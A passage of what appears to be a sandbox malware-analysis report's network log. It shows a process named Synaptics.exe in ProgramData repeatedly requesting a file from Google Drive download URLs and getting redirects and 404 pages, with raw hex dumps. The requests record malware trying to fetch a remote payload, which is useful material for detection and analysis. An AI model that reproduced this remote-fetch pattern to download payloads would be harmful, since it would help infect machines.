                                                                                                              2024-12-30 10:36:06 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              41192.168.2.449800142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:06 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:06 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC6w8KiNPAM8NnUbhRWts8zZTuJ4rdRzjNdRbm9PtjwyvUyXjYsURrF5VevbdMJVdGiIPlupnG4
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:06 GMT
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-YWxHEBQjzh8qnrkm9ylnng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:06 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:06 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 39 33 4c 5f 4d 4b 61 46 71 31 4a 4f 4c 35 6c 4a 76 49 69 48 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="T93L_MKaFq1JOL5lJvIiHQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:06 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              42192.168.2.449801142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:06 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                                                                                              2024-12-30 10:36:06 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:06 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-vjcpxr0eKV2F6uOVDv2LNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              43192.168.2.449802142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:06 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                                                                                              2024-12-30 10:36:06 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:06 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-3nasrcwOCiwMDiP1NLw7XQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              44192.168.2.449806142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:07 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:07 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC50WrBUvVBT8TPpLFG7tq1KQB8jI9w5J3rv08P04xSRLp_wjl39Pv_HGMioXQZnoGNL
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:07 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-0AZLRlIJ7QpzOh01IAIO5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:07 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:07 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 75 55 77 6a 37 50 49 47 56 47 79 39 61 65 62 48 69 49 49 4a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="PuUwj7PIGVGy9aebHiIIJA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:07 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              45192.168.2.449805142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:07 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:07 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC46MJxyTvNUmJpxkJYxaC4HQQmXrfblIoYxBYqYLOhv8qWyZ2Xa8KFZ8rY-YJOG_D7D
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:07 GMT
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-PulQbfjACG-CGBvQVBi9Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:07 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:07 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 42 36 72 74 6a 56 6b 66 68 78 64 63 6d 46 66 71 55 41 31 66 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="FB6rtjVkfhxdcmFfqUA1fQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:07 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              46192.168.2.449807142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:07 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                                                                                              2024-12-30 10:36:08 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:07 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-MwWedV4tN3ICN_gpmgHqIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              47192.168.2.449808142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:07 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                                                                                              2024-12-30 10:36:08 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:08 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-DnAf8--xuL5pxv7Rs1Fp-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              48192.168.2.449809142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:08 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:08 UTC1243INHTTP/1.1 404 Not Found
